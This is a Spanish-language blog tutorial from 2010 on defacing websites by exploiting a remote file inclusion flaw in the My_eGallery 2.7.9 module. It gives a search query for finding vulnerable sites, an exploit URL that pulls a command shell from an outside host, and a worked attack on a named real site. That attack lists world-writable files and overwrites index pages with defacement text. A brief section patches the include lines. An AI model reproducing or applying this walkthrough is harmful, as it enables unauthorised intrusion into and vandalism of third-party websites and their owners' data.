diumenge, 26 de setembre del 2010

Defacing con My_eGallery

[ 1 ] .- Introduccion.............................................. Status-x

[ 2 ] .- Que es My_eGallery........................................ Status-x

[ 3 ] .- Buscando Victimas......................................... Status-x

[ 4 ] .- Explorando el Bug......................................... Status-x

[ 5 ] .- Tips De Deface............................................ Status-x

[ 6 ] .- Arreglando el Bug......................................... Status-x

[ 6 ] .- Herramientas.............................................. Status-x

[ 7 ] .- Despedida................................................. Status-x


****************************************************************************




############################################################################

sh-2.05b$ ./ Introduccion

############################################################################

Saludos a toda la Scene Mexicana y de todo el mundo, bueno pues me he decidi

do a empezar a hacer mis propios tutoriales de Deface para todos ustedes

esta vez comenzare con un tutorial sencillo, sin embargo proximamente pondre

mas y mejores tutoriales solo que necesito ver la respuesta de todos ustedes

comenzemos pues con este tutorial que espero les sirva de algo ;), este tuto

va enfocado a personas que tienen conocimientos sobre comandos linux ;) y

que tengan nociones de hacking o defacing




############################################################################

sh-2.05b$ ./ Que es My_eGallery

############################################################################


My_eGallery es un sistema desarrollado originalmente para PostNuke con

algunas caracteristicas especiales como:

- Soporte de Imagenes

- Soporte de Archivos de Audio y Video

- Organizacion por Categorias y Subcategorias


El lenguaje original en que fue creado es Ingles y Aleman, es un sistema GNU

y esta programado en PHP.


El Sistema puede ser descargado en:


http://noc.postnuke.com/project/showfiles.php?group_id=155&release_id=317


La version AFECTADA es la 2.7.9 - sin embargo el autor menciona que es posi

ble que otras versiones tambien lo sean ;)



############################################################################

sh-2.05b$ ./ Buscando Victimas

############################################################################


La parte mas tediosa de todo esto jejeje, bien para esto usaremos el fiel

Google: http://www.google.com.mx


En nuestro criterio de busqueda usaremos una funcion de Google que nos sirve

para encontrar archivos o URLS especificos:


allinurl: modules.php?name=My_eGallery


Con los cual nos quedaria de resultado una URL como esta en la cual aparece

ran todas las webs que contengan esa url ;)

-------------------------------------------------------------------------
http://www.google.com.mx/search?hl=es&q=allinurl%3A+modules.php%3Fname%3D
My_eGallery&meta=
-------------------------------------------------------------------------

Y listo ya tenemos una amplia lista de sitios los cuales explorar ;)


############################################################################

sh-2.05b$ ./ Explorando el Bug

############################################################################


Bien el fallo radica en My_eGallery 2.7.9 en las siguientes lineas del

codigo:

--------------------------------------------------
include ("$basepath/public/imageFunctions.php");

include ("$adminpath/fileFunctions.php");
--------------------------------------------------

Con lo que podremos incluir archivos y ejecutar comandos *NIX de la siguiente

manera:

-----------------------------------------------------------------------------
http://victima.com/modules/My_eGallery/public/

displayCategory.php?basepath=http://atacante/cmd.gif?&cmd= AQUI COMANDO LINUX
-----------------------------------------------------------------------------

Bien pongamos un ejemplo real:

-------------------------------------------------------------------
http://www.cznet.it/modules/My_eGallery/public/displayCategory.php?
basepath=http://mx.geocities.com/razorkron/cmd.txt?&cmd=ls
-------------------------------------------------------------------


en donde ls es nuestro comando Linux y sirve para:


ls - enlista los archivos y directorios existentes


Y como vemos nos muestra la lista de archivos:


---------------------
displayCategory.php
displayMedia.php
displayMedia.php.old
displayTop.php
functions.php
imageFunctions.php
index.html
mainGallery.php
nmimage.php
uploadFile.php
---------------------

Tambien nos muestra datos del servidor Version de Kernel, user id, directorio

actual e informacion extra del servidor como version de Apache, etc.


En caso de que nuestro id de usuario sea:


----------------------------------
uid(99) euid(99) gid(99)  - Nobody
----------------------------------


Quiere decir que no tenemos permisos:


--------------------------
Permissão de Escrita: Não
--------------------------


y que se nos dificultara poder realizar nuestro deface sin embargo en dado

caso de que tuvieramos permisos para poder escribir archivos:


--------------------------
Permissão de Escrita: SIM
--------------------------


El comando a utilizar seria el siguiente:


---------------------------------------------------------------
cd /usr/www/htdocs/cznet.it/;echo Status-x Ownz You >index.html
---------------------------------------------------------------


Con lo cual nuestro deface se veria en la pagina principal, bien sin

embargo ya he mencionado que eso solo ocurriria si tuvieramos permisos de

escritura pero como no los tenemos pasemos a la siguiente etapa, Tips de

Deface, los cuales les ayudaran bastante en estos casos.



############################################################################

sh-2.05b$ ./ Tips de Deface

############################################################################


*/ Deface en Subdirectorios o Archivos con Permisos 777


Bien dado que no tenemos permisos de escritura en esa web no le podremos

hacer el deface en la pagina principal sin embargo podemos hacerle el deface

en alguno de los subdirectorios o en algun archivo con permisos de escritura

esto lo haremos de la siguiente manera:


- Nos situamos en el directorio donde estan los modulos del PHP Nuke de la

  web y enlistamos los archivos:


--------------------------------------
cd /usr/www/htdocs/cznet.it/modules;ls
--------------------------------------


Entonces empezaremos buscando archivos con permisos de escritura, esto lo

haremos con el siguiente comando:


--------------------------------------------------
cd /usr/www/htdocs/cznet.it/modules;find -perm 777
--------------------------------------------------



Y nos saldra de resultado:



---------------------------------------------------
./Cruscotti/index.php
./My_eGallery
./My_eGallery/gallery
./My_eGallery/gallery/Praga
./My_eGallery/gallery/Praga/Castello_temporale1.jpg
./My_eGallery/gallery/Praga/Praga.gif
./My_eGallery/gallery/Praga/mulino.jpg
./My_eGallery/gallery/Praga/mulino.zip
./My_eGallery/gallery/Praga/rano.jpg
./My_eGallery/gallery/Praga/thumb
./My_eGallery/gallery/Mikulasska
./My_eGallery/gallery/Mikulasska/0000auguri.jpg
./My_eGallery/gallery/Mikulasska/0001-13.jpg
./My_eGallery/gallery/Mikulasska/0001-e.jpg
./My_eGallery/gallery/Mikulasska/0002-28.jpg
./My_eGallery/gallery/Mikulasska/0003-18.jpg
./My_eGallery/gallery/Mikulasska/0003-2.jpg
./My_eGallery/gallery/Mikulasska/0003-30.jpg
./My_eGallery/gallery/Mikulasska/0003-9.jpg
./My_eGallery/gallery/Mikulasska/mikulasska.jpg
./My_eGallery/gallery/Mikulasska/thumb
./My_eGallery/gallery/temp
./My_eGallery/gallery/konupek
./My_eGallery/gallery/konupek/gallery.gif
./My_eGallery/gallery/konupek/thumb
./My_eGallery/gallery/Pisek
./My_eGallery/gallery/Pisek/gallery.gif
./My_eGallery/gallery/Pisek/thumb
./My_eGallery/temp
./My_eGallery/random/bindvv
find: ./WebMail: Permission denied
./World_Weather/cache
./Contact/language/lang-italian.php
./Contact/language/lang-czech.php
./Contact/language/lang-english.php
./Contact/index.php
-----------------------------------------------------


Y esos son los archivos a los que les podemos hacer el deface, ahora bien el

siguiente paso es hacer el deface para esto elegire el directorio y archivo:


----------------------
/Contact/index.php
----------------------


Entonces nos situamos en el directorio y enlistamos los archivos:


-----------------------------------------------
cd /usr/www/htdocs/cznet.it/modules/Contact/;ls
-----------------------------------------------


Y Bien procedemos a hacer nuestro deface:


--------------------------------------------------------------------------
cd /usr/www/htdocs/cznet.it/modules/Contact/;echo Status-x Here >index.php
--------------------------------------------------------------------------



Y listo nuestro deface ha sido realizado:



---------------------------------------------
http://www.cznet.it/modules/Contact/index.php
---------------------------------------------


Bien ese ha sido un pequeño tip ;) de parte de Status-x asi que ahora proce

demos a la parte White Hat - Arreglando el Bug o ayudando al Webmaster.



############################################################################

sh-2.05b$ ./ Arreglando el Bug

############################################################################


Es estupido dejar tu mail al admin para supuestamente ayudarlo y al final

no ayudarlo en absolutamente nada, sino simplemente contestandole:


Im a 1337 hax0r, y0u suck admin


Asi que mejor le echaremos una manita y le ayudaremos a arreglar el Bug.


Como ya habiamos dicho el Bug se encuentra en el archivo displayCategory.php

en las siguientes lineas,


------------------------------------------
("$basepath/public/imageFunctions.php");

 include ("$adminpath/fileFunctions.php");
------------------------------------------


Las cuales debemos sustituir por las siguientes:


----------------------------------------------------------
include ("modules/My_eGallery/public/imageFunctions.php");

include ("admin/modules/gallery/fileFunctions.php");
----------------------------------------------------------


Y listo nuestra vulnerabilidad esta arreglada.



############################################################################

sh-2.05b$ ./ Herramientas

############################################################################


Las herramientas utilizadas fueron las siguientes:



Ejecutor de Comandos Linux - http://mx.geocities.com/razorkron/cmd.txt

Realizado por Infektion Group de Brasil - Contacto: infektion@linuxmail.org


Buscador Google - http://www.google.com


editado por 3rr0r
-deyvid94@hotmail.com-

Cap comentari:

Publica un comentari a l'entrada